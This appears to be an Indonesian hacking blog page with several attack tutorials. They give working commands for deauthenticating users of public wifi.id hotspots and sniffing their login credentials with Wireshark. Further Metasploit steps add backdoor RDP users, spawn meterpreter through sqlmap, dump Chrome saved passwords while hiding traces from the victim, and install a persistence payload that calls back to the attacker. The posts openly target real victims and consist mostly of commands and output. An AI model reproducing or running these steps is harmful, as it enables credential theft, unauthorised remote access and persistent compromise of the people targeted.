Hacking

Mendapatkan Username Dan Password Wifi.ID Dengan Wireshark

April 4, 2016 by Jack Wilder 24 Comments

Beberapa waktu yang lalu saya pernah share cara untuk mendapatkan akses wifi.id gratis dengan cara kloning mac address ke pc target lang sudah login ke wifi.id sebelumnya. Nah, kali ini saya mencoba hal yang lebih “ekstrim” , mengambil paksa akun wifi.id milik orang lain, dan memaksa nya logout agar kita bisa login dengan akun miliknya.

Sebagai catatan, cara ini sangat tidak dianjurkan, karena ini termasuk sangat merugikan.

Pertama, pastikan kalian sudah konek ssid @wifi.id . Tidak perlu login, cukup konek kan saja.

Selanjutnya, buka terminal, lalu masukkan command berikut :

sudo airmon-ng start wlan0

Karena disitu ada notice enable on mon1 , maka masukkan command

sudo airodump-ng mon1

Untuk interface silahkan sesuaikan sendiri, kadang bsia mon0, atau mon1.

Lalu stop dengan menekan ctrl +c .

Selanjutnya masukkan command :

sudo airodump-ng –bssid 6C:99:89:8B:4B:50 mon1

BSSID yang dimasukkan adalah BSSID milik @wifi.id . Silahkan sesuaikan sendiri.

Lalu buka tab terminal baru. Kita open wireshark sebagai root user dengan command :

sudo wireshark

Nah, karena tadi mode monitor yang aktif mon1, maka kita pilih mon1, lalu klik start.

Masukkan filter http.request.method==POST , lalu apply.

Biarkan wireshark berjalan, sekarang kita hajar access point wifi.id nya.

aireplay-ng –deauth 190 -a 6C:99:89:8B:4B:50 –ignore-negative-one mon1

6C:99:89:8B:4B:50 adalah bssid milik wifi.id . silahkan sesuaikan.
Command diatas akan melakukan deauth pada semua client yang terhubung ke wifi.id, dan memaksa mereka untuk login ulang.

Sekarang tunggu di wireshark nya. Nunggu ada yang login ke wifi.id lagi.

Yep, dapet korban.

Yep, kita sudah dapet user sama password nya, tapi berhubung doi masih login ke wifi.id , jadi pass sama user tadi percuma.
Sekarang saat nya kita kill koneksi doi biar logout dari wifi.id.

aireplay-ng –deauth 190 -a 6C:99:89:8B:4B:50 -c 94:35:0A:32:52:D8 –ignore-negative-one mon1

sama dengan yang diatas, hanya saja disini kita tambahkan client mac address nya sehingga lebih spesifik.
Setelah selesai, bisa juga di kill dengan mdk3, biar si doi putus asa ga bisa konek, terus pulang deh 😀 .
Nah baru user sama password hasil curian tadi kita pake.

Oke sekian dulu tutorial kali ini, semoga bermanfaat. Sekali lagi, segala bentuk kriminal bukan tanggung jawab ane. 😀

Thanks to darkc0d3

Kalo mau copas credit ke linuxsec njing.

Mendapatkan Akses Remote Desktop Dengan Metasploit

March 31, 2016 by Jack Wilder 3 Comments

kali ini masih seputar metasploit. Yaitu lanjutan setelah kita mendapatkan meterpreter session di victim. Kita bisa menggunakan fitur getgui nya msf untuk menambahkan user dan mengontrol desktop korban .

Pertama, kita pastikan dulu kita telah mendapat hak akses system di victim, bukan user biasa.

meterpreter > getuid
Server username: WIN-IA0JPLFHM2GUzumaki
meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM

Lalu masukkan command untuk menambahkan username dan password :

run getgui -u <username> -p <password>

tapi disini saya mengalami error ketika menambahkan user dan password dengan metode tersebut.

meterpreter > run getgui -u nagisa -p linuxsec
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[-] Unexpected windows error 1332
[-] Error in script: NoMethodError undefined method `[]’ for nil:NilClass

Kita pakai cara lain.

Pertama, kita enable remote desktop nya dengan getgui.

meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it …
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto …
[*] Opening port in local firewall if necessary

Selanjutnya masuk ke cmd shell.

meterpreter > shell
Process 332 created.
Channel 4 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:Windowssystem32>

Lalu tambahkan user dan password dengan command :

net user <username> <password> /add

C:Windowssystem32>net user nagisa linuxsec /add
net user nagisa linuxsec /add
The command completed successfully.
C:Windowssystem32>

Sekarang kembali ke meterpreter shell.

C:UsersUzumakiDesktop>^C
Terminate channel 5? [y/N] y
meterpreter >

Lalu masukkan command ipconfig untuk mengetahui ip korban.

meterpreter > ipconfig

Langkh terakhir adalah mengakses desktop victim dengan user dan password serta ip yang sudah kita atur.
Silahkan gunakn remote desktop client kesukaan kalian, bisa rdesktop, remmina, dll.

Sekian tutorial kali ini, semoga bermanfaat. Share juga ke teman teman mu biar mereka tau.

Mendapatkan Meterpreter Session Dengan SQLmap

March 10, 2016 by Jack Wilder Leave a Comment

Kali ini saya akan share trik yang mungkin kalian belum tau. Sebenarnya SQLmap sendiri sangat powerfull karena selain memudahkan untuk melakukan injeksi otomatis, banyak fitur lain seperti spawn shell via sqlmap, spawn sql-shell via sqlmap, dan kali ini yang akan saya bahas adalah spawn metasploit meterpreter session dengan sqlmap.

Cara ini pernah saya gunakan saat melakukan eksploitasi kiptrix level 4, meskipun akhir nya gagal dilanjutkan karena tidak bisa melakukan rooting dengan localroot.

Oke langsung saja ke tutorial.

Cara ini bisa dilakukan jika kalian mengetahui direktori writable dari target, bisa dilihat di error page nya.
Cara ini harus dilakukan dengan menggunakan hak akses root di sqlmap. Karena kita membutuhkan hak akses itu saat membuat payload.

[email protected]:-$ sudo sqlmap -u http://urlsitusyangvuln.com?vuln.php?id=1337 –os-pwn

Selanjutnya pilih bahasa pemrograman apa yang digunakan di web tersebut.

Seperti yang saya bilang sebelumnya kalian harus tau drektori writable dari target.

Atau kalian juga bisa memilih opsi bruteforce jika belum tau.

Karena kita ingin menggunakan local os kita sebagai listener meterpreter nya, kita pilih opsi yang pertama.

Untuk yang ini kalian bebas memilih spawn shell atau meterpreter session. Kalau memilih shell kalian akan memanggil bash shell / cmd nya.

Untuk arsitektur pilih yang 32bit saja karena ini bisa jalan juga di 64bit.

Tunggu terminal memanggil metasploit kita, dan welcome to meterpreter..

Sekian tutorial kali ini, semoga bermanfaat , share juga ke teman teman mu biar mereka tau.

NB : Kalau mau copas kasih sumber nak 🙂

Dump Chrome Saved Password on Meterpreter Session

March 6, 2016 by Jack Wilder 3 Comments

Dari hasil otak atik google tadi akhir nya saya punya ide untuk melakukan hal yang menarik ketika kita berhasil mendapatkan akses meterpreter di komputer korban. Yaitu kita bisa mendownlaod password yang tersimpan ( saved password ) di browser chrome mereka. Dan menariknya password ini output nya langsung plan text, tidak perlu di crack atau di hash lagi.

Langusng saja ya ke tutorial.

Pertama, kalian harus mendownload tools untuk melakukan melakukan dump password di chrome.

Download di Security Exploded . File nya masih berbentuk installer.

Atau kalau kalian ingin tools yang sudah ter ekstrak, kalian bisa mendownload nya disini :

Download Chrome Password Dumper

Langkah langkah mendapatkan meterpreter saya anggap kalian sudah mengerti.

kalau masih bingung cari refrensi sebanyak banyak nya di google.

Atau baca artikel ini :

Backdooring Exe File with Metasploit

Kalau korban menggunakan OS Windows 7 keatas, pandai pandai lah bermain soceng.

Skip..

Saya anggap kalian sudah mendownload chrome password dumper diatas dan sudah masuk sesi meterpreter.

Upload Password Dumper nya dari lokal machine kita ke OS target.

meterpreter> upload /path/to/ChromePasswordDump.exe jembut.exe

Saya upload tools tadi di Desktop korban dengan nama jembut.exe

Selanjutnya, kita spawn cmd via meterpreter nya.

meterpreter> shell

Sekarang kita jalankan passsword dumper nya dengan perintah :

C:UsersUzumakiDesktop> jembut.exe ( sesuaikan dengan nama file yang kalian upload )

Ane test di VM, jadi saved password nya cuma satu, kalau kalian dapet target asli pasti result lebih banyak.

Gak etis kan kalo ane buat tutorial harus ngorbanin orang lain. Hehe.

Oke, kalo data sudah dapet semua, jangan lupa tools tadi dihapus agar korban gak curiga.

Keluar dulu dari cmd.

C:UsersUzumakiDesktop> exit

Lalu hapus dengan command

meterpreter > rm jembut.exe ( sesuaikan )

Kalau kurang jelas saya sudah buatkan video nya :

Nah sekian tutorial kali ini.

Share ke teman teman mu biar makin banyak yang mastah. *kidding

NB : saya membuat tutorial ini dengan tangan saya sendiri, kuota saya sendiri, screenshoot saya sendiri, dan ketikan saya sendiri. jadi yang mau copas tolong pengertiannya. Tidak susah kan memberi sumber link hidup ke post ini ?

How to Run Persistence Payload on Metasploit

February 19, 2016 by Jack Wilder 1 Comment

Kemarin kita sudah membahas cara meng-inject aplikasi windows dengan payloads. Nah , mungkin ada yang bertanya mungkinkah kita bisa langsung konek ke meterpreter session jika korban merestart / mematikan pc nya. Jadi kita tidak perlu melakukan exploit ulang ? Jawabannya sangat mungkin ^_^.

Saya anggap kalian sudah mendapat meterpreter session disini.

Jika belum coba pelajari tutorial yang ini :

Backdooring EXE Files with Metasploit

Nah langsung saja ke tutorial.

Pertama, kita cek dulu hak akses kita sebagai apa.

meterpreter > getuid

Kalau seperti ss saya diatas, kita cuma user regular. Kita butuh hak akses lebih untuk membuat persistence payload.

meterpreter > ps

Nah kita bisa melihat proses apa saja yang berjalan. Kita migrasi ke proses yang dijalankan minimal oleh sistem. Kali ini saya migrasi ke proses winlogon.exe dengan PID 480 .

meterpreter > migrate 480

Jika sukses harus nya sekarang kalian bertindak sebagai system user.

meterpreter > run persistence -h

Untuk melihat command apa saja yang bisa dipakai.

Contoh command yang saya jalankan :

meterpreter > run persistence -A -U -X -i 20 -p 666 -r 192.168.48.1

-X berarti payloads berjalan saat sistem booting

-i adalah interval listening dari payload yang kita buat

-U artinya payload aktif saat user log on ke sistem.

-A berarti konek secara otomatis ke agent yang cocok dengan exploit/multi/handler

-p isi dengan port listener

-r adalah ip kita.

Nah untuk testing masukkan command

meterpreter > reboot

untuk menguji apakah persistence payload yang kita buat berhasil.

Jika langkah langkah nya benar seharus nya kita langsung mendapatkan sesi meterpreter saat sistem windows aktif tanpa melakukan exploit ulang.

Untuk video nya biar lebih jelas simak dibawah :

Nah, bila kalian ingin menghapus persistence payload dari sistem korban masukkan command :

meterpreter > resource /home/uzumaki/.msf4/logs/persistence/WIN-IA0JPLFHM2G_20160219.0915/WIN-IA0JPLFHM2G_20160219.0915.rc

link file .rc nya sesuaikan sendiri dengan link yang dibuat saat menjalankan command untuk membuat persistence payload.

Sekian tutorial kali ini semoga bermanfaat.

SQL Injection with Advanced Hackbar

December 4, 2015 by Jack Wilder 8 Comments

Sebenarnya hackbar yang ini hampir sama dengan hackbar versi original nya, hanya saja lebih powerfull karena ada penambahan tools seperti bypass WAF, Dump in One Shoot ( DIOS ) , dll. Yang kalian butuhkan hanya mencari jumlah kolom dan angka ajaib nya, dan, hajar dengan DIOS.